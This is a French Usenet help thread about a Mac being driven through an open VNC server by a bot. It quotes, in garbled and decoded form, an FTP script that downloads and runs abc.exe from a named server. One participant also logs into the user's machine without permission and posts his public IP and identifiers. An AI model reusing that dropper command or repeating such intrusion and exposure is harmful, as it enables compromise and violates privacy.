Un Virus ?

RiGuad

unread,

Mar 2, 2007, 12:41:39 PM3/2/07

to

Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,”é`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

Eric Levenez

unread,

Mar 2, 2007, 12:58:44 PM3/2/07

to

Le 2/03/07 18:41, dans <45e861d4$0$5112$ba4a...@news.orange.fr>, « RiGuad »
<RiG...@KkBoodin.wanadoo.fr> a écrit :

> Dans n'importe quelle situation, a n'importe quel moment , y compris
> quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
> "écrit " tout seul les "choses" suivantes :
>
> (syste,root(`syste,²é`c,d:exe
> c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
> èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
> )smik èdel ik èqbc:exe èexit

Tout cela ressemble a ce que l'on envoie pour établir une session ftp (avec
un clavier QWERTY) et récupérer un exécutable windows :

open ftp.hypermart.net
user joh joh
binary
get abc.exe
...

Le site que le soft qui tape ton code clavier est donc : hypermart.net

> Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
> debrancher de son port usb, et de le rebrancher.
> Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
> "prend la main" sur tout ce que je peux faire , y compris debrancher le
> clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
> ci dessus indiquée.

As-tu un fichier dans le répertoire ~/Library/InputManagers ?

--
Éric Lévénez -- <http://www.levenez.com/>
Unix is not only an OS, it's a way of life.

Nina Popravka

unread,

Mar 2, 2007, 1:00:23 PM3/2/07

to

On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>(syste,root(`syste,"é`c,d:exe
>c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
>èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
>)smik èdel ik èqbc:exe èexit

C'est très drôle...
Y a bien un user joh sur ftp.hypermart.net, pass joh...
Mais pas de abc.exe à ramener :-)
--
Nina

Nina Popravka

unread,

Mar 2, 2007, 1:10:35 PM3/2/07

to

On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Le plus insupportable est lorsque l'on tchatte avec un ami,

Tu utilises IRC ?
--
Nina

Eric Levenez

unread,

Mar 2, 2007, 1:18:41 PM3/2/07

to

Le 2/03/07 19:00, dans <sgpgu2ht5nei1kspq...@4ax.com>, « Nina
Popravka » <Nina@nospam> a écrit :

Juste un MP3.

Nina Popravka

unread,

Mar 2, 2007, 1:37:28 PM3/2/07

to

On Fri, 02 Mar 2007 19:18:41 +0100, Eric Levenez <ne...@levenez.com>
wrote:

>Juste un MP3.

Même pas taggé et genre latino, assez marrant...
--
Nina

Fra

unread,

Mar 2, 2007, 2:17:28 PM3/2/07

to

Nina Popravka <Nina@nospam> wrote:

Y'a peut être des informations à Ben Laden de cachés dedans pour qu'un
gars essaie d'un aller par des moyens détournés.
--
Fra

Message has been deleted

Nina Popravka

unread,

Mar 2, 2007, 4:43:46 PM3/2/07

to

On Fri, 02 Mar 2007 22:30:06 +0100, Le Moustique
<lemo...@freesurf.fr> wrote:

>Ah, moi j'ai trouvé un VNC.exe... mais 40 Ko, ça me semble un peu mince.

Ah...
Lui, d'après certains AVs, c'est un bot IRC.
MacAfee, Symantec et Clamav ne voient rien, comme d'hab, tout comme
Avast et AVG, d'ailleurs.
Allez hop, direction la machine de test, je vais le regarder un peu
vivre demain au petit déj :-))))))))
--
Nina

RiGuad

unread,

Mar 2, 2007, 5:26:45 PM3/2/07

to

Oui, j'utilise IRC..

Bon , merci les gars de vos remarques, mais..

1-Comment cette ... "fonction" a t elle pu , toute seule ! , se créer
sur mon Imac G5 ?
2- Comment arreter ce truc ?
3- c'est la premiere fois en 20 ans que mon Mac décide pour moi de ce
qui apparait en texte sur mon ecran, et cela m'inquiete beaucoup. S'il
est capable d'ecrire tout seul, il peut etre capable d'effacer ou de
transmettre mes fichiers tout seul ?
Tout cela est tres flippant.

Euh... Nina , peux tu expliquer ton message précedent... ?

Nina Popravka a écrit :

Nina Popravka

unread,

Mar 2, 2007, 5:41:21 PM3/2/07

to

On Fri, 02 Mar 2007 18:26:45 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

> S'il
>est capable d'ecrire tout seul,

Ca n'est pas lui qui écrit, c'est quelqu'un, et quelqu'un qui utilise
un clavier qwerty. Et qui donne l'ordre de récupérer des fichiers sur
un FTP où je viens de trouver un ravissant virus.

>Euh... Nina , peux tu expliquer ton message précedent... ?

Tu dis que tu chattes, je te demande si tu utilises IRC pour le faire.
Parce que de nombreuses saloperies utilisent des canaux IRC pour
contrôler des machines, et le virus que j'ai trouvé est précisément,
je crois (je l'ai pas encore etsté), de cette race.
Donc si tu utilises IRC, il est possible que tu sois tombé sur un truc
comme ça par hasard. Je ne pense d'ailleurs pas que ça puisse avoir la
moindre action sur ta machine.

M'enfin aussi longtemps que tu ne diras pas exactement *où* les
caractères fantômes apparaissent, et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
m'intrigue...
--
Nina

RiGuad

unread,

Mar 2, 2007, 6:34:28 PM3/2/07

to

Nina Popravka a écrit :

> On Fri, 02 Mar 2007 18:26:45 -0400, RiGuad

> Donc si tu utilises IRC,
Oui tootafé, tant MSN, avec aMSN que les canaux d'IRC, avec Snak avec
lequel je suis courrament sur Irc.Voila.fr.

> M'enfin aussi longtemps que tu ne diras pas exactement *où* les
> caractères fantômes apparaissent,

Ces caracteres prennent la main dans n'importe quelles appli, a
n'importe quel moment, avec par exemple une page AppleWorks vierge ouverte.
C'est d'ailleurs comme ca que j'ai pu le faire ecrire ce que je vous ai
envoyé. suis parti au boulot, en laissant mon curseur sur une page de
traitement de texte vierge
Mon Mac était alors connecté au Net.

et que ne feras pas un netstat -a,
> puis posteras le résultat ici, ça sera difficile de dire quoi que ce
> soit.

Dis moi comment faire ca , stp.

Nina Popravka

unread,

Mar 2, 2007, 6:46:13 PM3/2/07

to

On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Mon Mac était alors connecté au Net.

Avec un machin IRC lancé en tâche de fond ?

>et que ne feras pas un netstat -a,
>> puis posteras le résultat ici, ça sera difficile de dire quoi que ce
>> soit.
>Dis moi comment faire ca , stp.

Terminal, netstat -a
Le résultat a cette tronche :
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 localhost.6010 *.* LISTEN
tcp6 0 0 localhost.6010 *.* LISTEN
tcp4 0 52 192.168.163.100.ssh mic92-4-82-224-2.2614
ESTABLISHED

etc etc etc...

La deuxième partie, genre :
Active LOCAL (UNIX) domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
1db9000 stream 0 0 0 1db9330 0 0
1db9330 stream 0 0 0 1db9000 0 0
1db94c8 stream 0 0 0 1db9550 0 0
/var/run/mDNSResponder
1db9550 stream 0 0 0 1db94c8 0 0
1db95d8 stream 0 0 0 1db96e8 0 0
/var/run/mDNSResponder

c'est pas la peine de la mettre. Enfin perso je ne sais pas quoi en
faire.
--
Nina

RiGuad

unread,

Mar 2, 2007, 11:13:29 PM3/2/07

to

Bon...tu l'auras voulu...lol... je te met ce que j'ai obtenu par ta
commande du terminal :

Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)

tcp4 0 0 localhost.smtp *.* LISTEN
tcp4 0 0 192.168.0.21.52534 news-reader.wana.nntp
ESTABLISHED
tcp4 0 0 192.168.0.21.52533 news-reader.wana.nntp
ESTABLISHED
tcp4 0 0 192.168.0.21.52343 by1msg2145209.ph.msnp
ESTABLISHED
tcp4 0 0 192.168.0.21.5900 .50938
ESTABLISHED
tcp4 0 0 192.168.0.21.52151 by1msg4082117.ph.msnp
CLOSE_WAIT
tcp4 0 0 192.168.0.21.5900 .34683
ESTABLISHED
tcp4 0 0 *.63251 *.* LISTEN
tcp4 0 0 *.62234 *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.svrloc *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.afpovertcp *.* LISTEN
tcp46 0 0 *.afpovertcp *.* LISTEN
tcp4 0 0 localhost.47807 *.* LISTEN
tcp4 0 0 *.5901 *.* LISTEN
tcp46 0 0 *.5901 *.* LISTEN
tcp4 0 0 *.ipp *.* LISTEN
tcp4 0 0 *.5900 *.* LISTEN
tcp46 0 0 *.5900 *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 192.168.0.21.commplex- *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 localhost.netinfo-loca localhost.1017
ESTABLISHED
tcp4 0 0 localhost.1017 localhost.netinfo-loca
ESTABLISHED
tcp4 0 0 localhost.netinfo-loca localhost.1021
ESTABLISHED
tcp4 0 0 localhost.1021 localhost.netinfo-loca
ESTABLISHED
tcp4 0 0 localhost.netinfo-loca *.* LISTEN
tcp4 0 0 *.printer *.* LISTEN
tcp6 0 0 *.515 *.* LISTEN
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.svrloc *.*
udp4 0 0 *.* *.*
udp4 0 0 *.ipp *.*
udp4 0 0 localhost.49162 localhost.1022
udp4 0 0 localhost.49161 localhost.1022
udp4 0 0 localhost.1022 *.*
udp4 0 0 localhost.49158 localhost.1023
udp4 0 0 localhost.1023 *.*
udp4 0 0 192.168.0.21.ntp *.*
udp4 0 0 localhost.ntp *.*
udp4 0 0 *.ntp *.*
udp4 0 0 192.168.0.21.49155 *.*
udp4 0 0 *.mdns *.*
udp6 0 0 *.5353 *.*
udp6 0 0 *.5353 *.*
udp4 0 0 *.mdns *.*
udp4 0 0 localhost.netinfo-loca *.*

Merci de me dire ce que cela t'apprend. moi j'y reconnais mon IP interne.
Les nombres apres "localhost", sont ce mes ports ouverts ?

Nina Popravka a écrit :

RiGuad

unread,

Mar 2, 2007, 11:18:38 PM3/2/07

to

Nina Popravka a écrit :

> On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
> <RiG...@KkBoodin.wanadoo.fr> wrote:
>
>> Mon Mac était alors connecté au Net.
> Avec un machin IRC lancé en tâche de fond ?

ben si tu estimes que le réseau MSN trafique sous protocole IRC, ce dont
je doute, : oui

Mon aMSN est toujours connecté, effectivement.
Mais si je ne me trompe , MSN a son propre protocole fermé propre a
Microsoft, non ?

Par contre se connecter avec Snak, ou MIRC pour les pceiste sur des
canaux genre Ircnet ou efnet, etc... releve bien du protocole IRC,
contrairement aux protocoles fermés de messagerie propriétaire genre MSN
ou Yahoo ou AIM, etc...

suis je dans l'erreur ?

Jacques Foucry

unread,

Mar 3, 2007, 3:29:09 AM3/3/07

to

Nina Popravka <Nina@nospam> wrote:

> En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
> m'intrigue...

Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté
dès la mise en circulation ou par un téléchargement quelconque en DCC
par exemple non ?

Jacques
--
« Mac OS X Server à votre Service » en vente au Monde en Tique.
<http://www.lmet.fr/fiche.cgi?_ISBN=9782952726603>
Attention, plus que 19 exemplaires.

Nina Popravka

unread,

Mar 3, 2007, 4:03:55 AM3/3/07

to

On Sat, 3 Mar 2007 09:29:09 +0100, jac...@foucry.net (Jacques Foucry)
wrote:

>Mais, pour que ça fonctionne, il faut ou que le client IRC soit infecté
>dès la mise en circulation ou par un téléchargement quelconque en DCC
>par exemple non ?

Le truc est du à un virus parfaitement classique, qui installe un
backdoor qui permet de contrôler la bécane via IRC.
T'as un doc intéressant là :
<http://honeynet.org/papers/trans/Les-botnets.doc>

C'est très improbable qu'il existe des virus de ce type sur Mac
(koike...).
En revanche, ce qui est curieux, c'est que dans son histoire, ça
ressemble à un truc de contrôle à distance genre VNC.
Ou une faille de son logiciel?
--
Nina

Nina Popravka

unread,

Mar 3, 2007, 4:18:50 AM3/3/07

to

On Sat, 03 Mar 2007 00:13:29 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>CLOSE_WAIT
>tcp4 0 0 192.168.0.21.5900 .34683
>ESTABLISHED

>tcp4 0 0 *.5901 *.* LISTEN
>tcp46 0 0 *.5901 *.* LISTEN

>tcp4 0 0 *.5900 *.* LISTEN
>tcp46 0 0 *.5900 *.* LISTEN

Tu te fous de qui ?
Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton
pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et
sans mot de passe.
Tu as de la chance qu'il ne te soit rien arrivé de plus grave que
quelques bricolesà l'écran.
On y croit pas...
--
Nina

Message has been deleted

arno

unread,

Mar 3, 2007, 5:31:36 AM3/3/07

to

Benoit Leraillez <benoit....@leraillez.sansspam.com> wrote:

> Nina Popravka <Nina@nospam> wrote:
>
> > On y croit pas...
>
> Juste un truc la Nina : où as-tu récupérer son adresse IP publique
> pour faire tout ça ? Parce que moi je ne vois que du 192.168.0.21 et
> là...

Les entêtes de ses messages...

--
arno

Frédérique & Hervé Sainct

unread,

Mar 3, 2007, 5:38:43 AM3/3/07

to

Nina Popravka <Nina@nospam> wrote:

> Y a pas de pass sur ton VNC, ta machine s'appelle StoneGuard, ton
> pseudo MSN est Ricardo, et je viens de rentrer dessus sans problème et
> sans mot de passe.
> Tu as de la chance qu'il ne te soit rien arrivé de plus grave que
> quelques bricolesà l'écran.
> On y croit pas...

chapeau...

--
Frédérique & Hervé Sainct, h.sa...@laposte.net [fr,es,en,it]
Frédérique's initial is missing in front of the above address
l'initiale de Frédérique manque devant l'adresse email ci-dessus

Nina Popravka

unread,

Mar 3, 2007, 5:37:00 AM3/3/07

to

On Sat, 3 Mar 2007 11:31:36 +0100, jo...@facmed.u-nancy.fr (arno)
wrote:

>Les entêtes de ses messages...

Voilà...
Tout le NG mort de rire doit être en train de visiter son Mac :-)
--
Nina

Message has been deleted

arno

unread,

Mar 3, 2007, 5:48:22 AM3/3/07

to

Benoit Leraillez <benoit....@leraillez.sansspam.com> wrote:

> arno <jo...@facmed.u-nancy.fr> wrote:
>
> > Les entêtes de ses messages...
>

> J'y pensais, mais comme mamadoo ne fait pas de l'IP fixe et que rien
> ne dit qu'il n'est pas sous modem et non ADSl...

Quelqu'un qui dit laisser touner aMSN en permanence et qui aurait une
connexion RTC... c'est tout de même peu probable.
Et s'il reste connecté en permanence, il garde son IP au moins 24H,
souvent bien plus.

>je me demandais si elle
> avait une autre piste. Parce que la Nina elle a un flair comac.

Pas besoin de sortir le marc de café où les viscères de poulet pour y
lire l'adresse IP quand elle apparait en clair :)

--
arno

arno

unread,

Mar 3, 2007, 5:48:22 AM3/3/07

to

Nina Popravka <Nina@nospam> wrote:

C'est toi qui a commencé à lui demander de fournir en public le plan
d'accès à sa maison...
qu'il ait laissé les clés sur la porte, c'est un plus :)

--
arno

Message has been deleted

RiGuad

unread,

Mar 3, 2007, 8:40:58 AM3/3/07

to

Bon, donc , en recap a mon constat d'origine, ca n'aurait pas été le Mac
qui est infecté mais quelqu'un qui tapait en direct cette ligne de
commande que j'ai envoyé dans mon post d'origine, et ceci par l'acces VNC ?
Dans ce cas comment mon IP publique du moment est elle connue ?

Nina Popravka a écrit :

RiGuad

unread,

Mar 3, 2007, 8:53:43 AM3/3/07

to

ah ok, l'IP est ecrite en clair dans l'en tete des messages envoyés sur NG.
L'Ip publique d'un emetteur est elle toujours inscrite dans l'entete
d'un mail recu ?

Je decouvre...

Mais cette IP changeant toutes les 24 h environ , le rigolo qui aurait
tapé cette ligne en entrant par mon VNC ouvert connaitrait mon IP
publique comment ?

RiGuad a écrit :

RiGuad

unread,

Mar 3, 2007, 9:15:04 AM3/3/07

to

oui, deux dossier : "Ecamm" contenau des ucs que je crois etre en rapprt
avec l'enregisrement des conversations telephoniques via Skype, et un
autre "Growl Safari"
>
> As-tu un fichier dans le répertoire ~/Library/InputManagers ?
>

Nina Popravka

unread,

Mar 3, 2007, 9:42:59 AM3/3/07

to

On Sat, 03 Mar 2007 09:53:43 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Mais cette IP changeant toutes les 24 h environ , le rigolo qui aurait
>tapé cette ligne en entrant par mon VNC ouvert connaitrait mon IP
>publique comment ?

Mais bordel...
Personne ne t'en veut particulièrement.
Simplement des milliers de robots scannent à longueur de journée les
bécanes situées sur les réseaux de FAIs grand public à la recherche de
failles, une des plus belles étant un serveur VNC sans passe, chose
exclusivement due à l'inconscience de l'interface chaise-clavier.
Tu as un Mac, donc ce que t'envoie le robot ne fait pas ce qu'il
devrait faire : te faire ramener et exécuter une merde. A la place le
script s'affiche.
Ca le fera le jour où les virus seront bi-plateformes, et de toute
manière pour s'en protéger suffit de ne plus être inconscient.
--
Nina

Nina Popravka

unread,

Mar 3, 2007, 1:43:36 PM3/3/07

to

On Sat, 3 Mar 2007 11:48:22 +0100, jo...@facmed.u-nancy.fr (arno)
wrote:

>qu'il ait laissé les clés sur la porte, c'est un plus :)

Il a d'ailleurs toujours les fesses à l'air, ce qui donne à penser
qu'il n'a pas encore percuté.
Je resterai stoïque.
;->>>>
--
Nina

RiGuad

unread,

Mar 3, 2007, 4:50:56 PM3/3/07

to

Nina Popravka a écrit :

> On Sat, 03 Mar 2007 09:53:43 -0400, RiGuad
> <RiG...@KkBoodin.wanadoo.fr> wrote:
>
>> Mais cette IP changeant toutes les 24 h environ , le rigolo qui aurait
>> tapé cette ligne en entrant par mon VNC ouvert connaitrait mon IP
>> publique comment ?
>
> Mais bordel...
> Personne ne t'en veut particulièrement.
> Simplement des milliers de robots scannent à longueur de journée les
> bécanes situées sur les réseaux de FAIs grand public à la recherche de
> failles, une des plus belles étant un serveur VNC sans passe,

Ok, donc VNC quitté.
Quelle url est envoyée pour acceder ainsi au Mac, sachant que mon port
VNC n'etait pas mappé au niveau de mon modem routeur ?
Parce que moi je ne suis jamais arrivé a entrer dans mon Mac domicile a
distance via justement VNC depuis mon Mac Bureau a partir de Chiken of
the VNC .

Je tapais l'url suivante : XXX.XXX.XXX.XXX:YYYY ou Y est l'adresse IP
publique, et Y le port VNC, et ca ne marchait pas.
Faut il inclure l'IP privée et sous quelle forme ?

Merci

Nina Popravka

unread,

Mar 3, 2007, 5:35:41 PM3/3/07

to

On Sat, 03 Mar 2007 17:50:56 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Ok, donc VNC quitté.
>Quelle url est envoyée pour acceder ainsi au Mac, sachant que mon port
>VNC n'etait pas mappé au niveau de mon modem routeur ?

Heu... 80.8.75.191 dans le client VNC ?
Ou 80.8.75.191:5900

>Parce que moi je ne suis jamais arrivé a entrer dans mon Mac domicile a
>distance via justement VNC depuis mon Mac Bureau a partir de Chiken of
>the VNC .

M'étonne pas... y a un problème de profondeur de couleur sur le Mac.
La fenêtre s'ouvre furtivement et se referme aussi sec. Je n'y arrive
qu'avec TightVNC (sur PC). Pas mal galéré là-dessus.

>Faut il inclure l'IP privée et sous quelle forme ?

Nan... mais y a un truc zarb chez toi, ça fait 50 mn que nmap scanne,
et il est pas rendu.
--
Nina

RiGuad

unread,

Mar 3, 2007, 6:57:00 PM3/3/07

to

Nina Popravka a écrit :

Ben depuis , j'ai changé d'IP, j'ai quitté VNC, et demandé a NetBarrrier
de bloquer connexion entrante venant de 82.224.20.184, c'est ptet en
rapport ?

Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
connexion entrante tcp port 13517, et parfois 1080.
Ces ports sont dédiés a quoi ?
Idem plus rarement connexion entrante TCP Microsoft SQL Server et
connexion entrante TCP SMB/CIFS - Windows file service.
Qu'est ce ?.

D'une facon générale , doit je bloquer toute tentative de connexion
entrante au sens ou NetBarrier l'entend ?

Little Snitch m'informe des connexions sortantes de mon Mac, et c'est
d'ailleurs la que j'ai decouvert que Mon Mac et Crosoft tchattaient
grave a mon insu.
Mais Des connexions entrante honnetes, ca peut etre quoi ?

Nina Popravka

unread,

Mar 4, 2007, 2:46:57 AM3/4/07

to

On Sat, 03 Mar 2007 19:57:00 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Ben depuis , j'ai changé d'IP, j'ai quitté VNC, et demandé a NetBarrrier
>de bloquer connexion entrante venant de 82.224.20.184, c'est ptet en
>rapport ?

Si ton Mac est réglé comme étant en DMZ au niveau de ton routeur, oui.
Et il n'a rien à foutre en DMZ.

>Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
>connexion entrante tcp port 13517, et parfois 1080.
>Ces ports sont dédiés a quoi ?
>Idem plus rarement connexion entrante TCP Microsoft SQL Server et
>connexion entrante TCP SMB/CIFS - Windows file service.
>Qu'est ce ?.

Le bruit de fond d'internet. Des robots qui scannent inlassablement à
la recherche de failles. Ca doit bien représenter la moitié du
traffic.
Sauf le 13517 qui doit avoir un rapport avec un truc de chat
quelconque.

>D'une facon générale , doit je bloquer toute tentative de connexion
>entrante au sens ou NetBarrier l'entend ?

Vois pas l'intérêt de NetBarrier quand on a un routeur.
--
Nina

Jacques Foucry

unread,

Mar 4, 2007, 2:58:44 AM3/4/07

to

Nina Popravka <Nina@nospam> wrote:

> Le truc est du à un virus parfaitement classique, qui installe un
> backdoor qui permet de contrôler la bécane via IRC.
> T'as un doc intéressant là :
> <http://honeynet.org/papers/trans/Les-botnets.doc>

J'irais lire ça lundi du boulot :-)

Merci Nina.

JPaul

unread,

Mar 4, 2007, 4:46:21 AM3/4/07

to

Nina Popravka <Nina@nospam> wrote:

> T'as un doc intéressant lą :
> <http://honeynet.org/papers/trans/Les-botnets.doc>

Trčs intéressant. Merci.

JPaul.
--
/==/==\\-\ Jean-Paul BLANC
/ /--/--//\\ quelque-part (somewhere)
|/| L |\\\ en (in)
\/|| = |||\\\ FRANCE

Jacques Perrocheau

unread,

Mar 4, 2007, 12:52:29 PM3/4/07

to

RiGuad <RiG...@KkBoodin.wanadoo.fr> wrote:

> Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
> connexion entrante tcp port 13517, et parfois 1080.
> Ces ports sont dédiés a quoi ?

<http://www.iana.org/assignments/port-numbers>

La page officielle.

> Idem plus rarement connexion entrante TCP Microsoft SQL Server et
> connexion entrante TCP SMB/CIFS - Windows file service.
> Qu'est ce ?.
>
> D'une facon générale , doit je bloquer toute tentative de connexion
> entrante au sens ou NetBarrier l'entend ?
>
> Little Snitch m'informe des connexions sortantes de mon Mac, et c'est
> d'ailleurs la que j'ai decouvert que Mon Mac et Crosoft tchattaient
> grave a mon insu.
> Mais Des connexions entrante honnetes, ca peut etre quoi ?

Plutôt que d'installer des multiples couches de préservatifs, plus ou
moins facile à paramétrer, tu pourrais simplement activer le firewall de
Mac OS X, au cas où tu utilises l'Airport. Dans ton cas le plus
important est de paraméter le firewall de ton routeur.

--
Jacques PERROCHEAU
________________________________________________________________________
e-mail: mailto:jperr...@mac.com

JPaul

unread,

Mar 4, 2007, 1:05:27 PM3/4/07

to

Jacques Perrocheau <jperr...@mac.com.invalid> wrote:

> RiGuad <RiG...@KkBoodin.wanadoo.fr> wrote:
>
> > Mais ce dernier continue a me dire qu'il bloque sans discontinuer une
> > connexion entrante tcp port 13517, et parfois 1080.
> > Ces ports sont dédiés a quoi ?
>
> <http://www.iana.org/assignments/port-numbers>
>
> La page officielle.

Oui, mais 13517 fait partie des "unassigned" :-(

Nina Popravka

unread,

Mar 4, 2007, 1:15:54 PM3/4/07

to

On Sun, 4 Mar 2007 19:05:27 +0100, bl...@empty.org (JPaul) wrote:

>Oui, mais 13517 fait partie des "unassigned" :-(

Et 1080 est assigned, mais en fait utilisé par quantité de backdoors.
Il est dans le top 10 du bruit de fond.
De nos jours, c'est pas passionnant de savoir à quoi un port est
assigné offciellement, vaut mieux s'intéresser à ce qui se passe
vraiment dessus :-)
--
Nina

RiGuad

unread,

Mar 4, 2007, 8:19:21 PM3/4/07

to

Je voudrais remercier tout le monde des informations transmises ici et
qui m'ont beaucoup instruit.
En particulier le temps que m'a accordé Nina qui ... s'il est certain
que sa maniere de s'exprimer se veut resolument antipédagogique, m'a
permi de comprendre bien des choses inquietantes pour certaines.
Merci de comprendre aussi que l'usage du Net est grand public, et que si
l'usage de Mac OS et du Net me passionne, je ne suis pas un Professionel
mais un Macounet qui veut comprendre, d'ou mes questions qui ont du
paraitre betes a certains..., et que les concepts et termes que vous
employez, s'ils demontrent vos compétences en la matière ont bien des
recherches de ma part pour simplement en comprendre le sens.
Les réponses aux questions en amenent une foultitude d'autres, et je ne
voudrais pas mobiliser le Chan entier pour m'instruire, sans doute vais
je chercher un NG moins pointu que celui ci, ou alors ouvrir des Fils
spécifiques a mes questions...
Merci aussi des docs referentiels fournis... l'assignation des ports,
meme si elle n'est que théorique il est vrai, et ce truc sur les
botnets, passionnant.
J'ai decouvert a quel point les ceussent qui ont des pc ont un probleme
de base terrible concernant l'acces a leur machine par n'importe qui, et
je me dis que , entre les Virus connus, ceux qui ne le sont pas, les
bugs logiciels, le merdier Winsoft qui equipe leur machine,
l'incertitude d'un bon usage , etc... il doit etre bien difficile ,
quand on a un pc et qu'on constate un fonctionnement anormal, de savoir
ce qui ne va pas.

TiPunch tropical a tous...

JPaul a écrit :
> Nina Popravka <Nina@nospam> wrote:
>
>> T'as un doc intéressant là :
>> <http://honeynet.org/papers/trans/Les-botnets.doc>
>
> Très intéressant. Merci.
>
> JPaul.

Nicolas MICHEL

unread,

Mar 5, 2007, 4:41:14 AM3/5/07

to

Jacques Perrocheau <jperr...@mac.com.invalid> wrote:

> Plutôt que d'installer des multiples couches de préservatifs, plus ou
> moins facile à paramétrer, tu pourrais simplement activer le firewall de
> Mac OS X, au cas où tu utilises l'Airport. Dans ton cas le plus
> important est de paraméter le firewall de ton routeur.

En plus de ce que tu dis, plein de bon sens dureste, je rapelles que le
problème de base était l'absence de mot de passe.

Et qu'on avait accès à la machine pour - par exemple - y mettre un
keylogger (un truc qui sert entre autre à récupérer les mots de passe).

Selon moi dans un cas comme ça en plus de Little Snitch et du reste,
un reset de tous les mots de passe du mac et tout particulièrement des
mot de passes enregistrés dans le keychain, comme les comptes banquaires
ou itms, s'impose.

Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
sérieux. Perso j'utilises pwgen pour générer des mots de passe
aléatoires mais n'importe quel password alpha-numérique autre que
Ricardo01 devrait le faire.

--
Nicolas

Nicolas MICHEL

unread,

Mar 5, 2007, 4:41:14 AM3/5/07

to

RiGuad <RiG...@KkBoodin.wanadoo.fr> wrote:

> Merci de comprendre aussi que l'usage du Net est grand public, et que si
> l'usage de Mac OS et du Net me passionne, je ne suis pas un Professionel
> mais un Macounet qui veut comprendre, d'ou mes questions qui ont du
> paraitre betes a certains...

La seule bêtise que tu aies faite était de ne pas mettre de mot de passe
sur VNC.

Les questions ne sont jamais bête et surtout pas les questions que tu
t'es posées dans ce fil. Dureste on a certainement été nombreux à
aprendre des trucs grâce à toi (et aux réponses qui t'on été données)

> et que les concepts et termes que vous
> employez, s'ils demontrent vos compétences en la matière ont bien des
> recherches de ma part pour simplement en comprendre le sens.

Par principe comme par flemme, on ne présuppose pas de niveau de son
interlocuteur quand on réponds. Ce serait présomptueux de notre part.
Et puis un problème technique amène des réponses techniques.
Si tu ne comprends pas un truc, demandes des précisions.

> Les réponses aux questions en amenent une foultitude d'autres, et je ne
> voudrais pas mobiliser le Chan entier pour m'instruire, sans doute vais
> je chercher un NG moins pointu que celui ci, ou alors ouvrir des Fils
> spécifiques a mes questions...

Ce forum est le bon endroit pour tes questions.
Dumoins je n'en connais pas de meilleur.
Simplement ça demande effectivement un peu de temps pour analyser les
réponses et les comprendre. Au besoins, je me répète, tu peux demander
des éclairsissements ou même un résumé de ce que tu dois faire pour
régler ton problème.

> J'ai decouvert a quel point les ceussent qui ont des pc ont un probleme
> de base terrible concernant l'acces a leur machine par n'importe qui

Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
défaut un utilisateur "admin" sans mots de passe ?
Bin oui, c'est super sécurisé M$ :>

> et je me dis que , entre les Virus connus, ceux qui ne le sont pas, les
> bugs logiciels, le merdier Winsoft qui equipe leur machine, l'incertitude
> d'un bon usage , etc... il doit etre bien difficile , quand on a un pc et
> qu'on constate un fonctionnement anormal, de savoir ce qui ne va pas.

Attends, tu ne voudrais tout de même pas enlever le pain de la bouche
